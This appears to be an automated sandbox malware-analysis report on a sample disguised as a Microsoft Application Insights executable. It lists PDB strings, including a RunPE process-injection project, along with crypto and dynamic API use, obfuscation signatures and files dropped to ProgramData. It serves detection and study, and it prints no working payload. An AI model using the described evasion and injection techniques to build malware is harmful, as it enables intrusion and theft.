Source: sqlite3.dll.2.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, Microsoft.ApplicationInsights.Channel/u00331A7E684.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036E29A2B8.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: certificate valid
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source: Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source: Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00412560 push eax; ret 2_2_0041258E
PE file contains sections with non-standard names
Source: sqlite3[1].dll.2.dr Static PE information: section name: /4
Source: sqlite3[1].dll.2.dr Static PE information: section name: /19
Source: sqlite3[1].dll.2.dr Static PE information: section name: /35
Source: sqlite3[1].dll.2.dr Static PE information: section name: /51
Source: sqlite3[1].dll.2.dr Static PE information: section name: /63
Source: sqlite3[1].dll.2.dr Static PE information: section name: /77
Source: sqlite3[1].dll.2.dr Static PE information: section name: /89
Source: sqlite3[1].dll.2.dr Static PE information: section name: /102
Source: sqlite3[1].dll.2.dr Static PE information: section name: /113
Source: sqlite3[1].dll.2.dr Static PE information: section name: /124
Source: sqlite3.dll.2.dr Static PE information: section name: /4
Source: sqlite3.dll.2.dr Static PE information: section name: /19
Source: sqlite3.dll.2.dr Static PE information: section name: /35
Source: sqlite3.dll.2.dr Static PE information: section name: /51
Source: sqlite3.dll.2.dr Static PE information: section name: /63
Source: sqlite3.dll.2.dr Static PE information: section name: /77
Source: sqlite3.dll.2.dr Static PE information: section name: /89
Source: sqlite3.dll.2.dr Static PE information: section name: /102
Source: sqlite3.dll.2.dr Static PE information: section name: /113
Source: sqlite3.dll.2.dr Static PE information: section name: /124
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00405E20

Persistence and Installation Behavior:

barindex
Drops PE files to the application program directory (C:\ProgramData)
